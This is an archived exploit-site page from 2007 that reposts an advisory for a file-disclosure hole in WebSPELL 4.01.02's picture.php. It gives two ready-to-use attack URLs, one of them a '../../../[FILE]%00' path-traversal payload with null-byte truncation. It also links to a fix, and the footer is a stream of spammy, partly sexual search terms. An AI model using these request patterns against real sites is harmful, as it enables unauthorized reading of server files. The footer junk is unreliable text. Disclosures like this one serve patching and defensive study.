about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability



2007-04-06 WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability
Rated as : Moderate Risk

# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure
Vulnerability
# Discovered by: Trex
# Visit: www.Trex-Online.net / www.UnderGround.ag
# Comment: Happy easter!
#
#   ___     ___
#  /   \   /   \       ___________________________
# /   / \_/ \   \     /                           \
# \__/\     /\__/    /  GIVE ME A CARROT OR I WILL \
#      \O O/         \      BLOW UP YOUR HOUSE     /
#   ___/ ^ \___      / ___________________________/
#      \___/        /_/
#      _/ \_
#   __//   \\__
#  /___\/_\/___\
#
#
#
# Vulnerability 1:
# Advantage: works independently from PHP version.
# Disadvantage: works dependently from PHP option register_globals (=
on).
#
# http://[SITE][PAHT]/picture.php?file=[FILE]
#
#
#
# Vulnerability 2:
# Advantage: works independently from PHP option register_globals.
# Disadvantage: works dependently from PHP versions (< 4.3.0).
#
# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00
#
#
#
# Solution:
# http://fixes.trex-online.net/picture.rar
securitydot.net - 2007-04-06

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:59:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW.89.COM wap.moboob t935t Www.Xxx.Co dog fuck w MBOX6.com+ news for c bebo sign www.sexco. Www.touchg www.naruto None t758t nud bollyw Fars blue flime Video porn mambo Remo shakeelase Www.touchg amrika ass Searching php-nuke 2 shakeelase apache 2.2 clipart Www.touchg t213t lalat.com search/exp t974t News Searc Www.feesex xvidoe fre sarah azha sax wallp www.sozhao Secxo www.yotub. t256t www.iphone mambo Remo tease orde sania mirz Sonik lalat com Donlod kiran sex Wap.video. sex gal co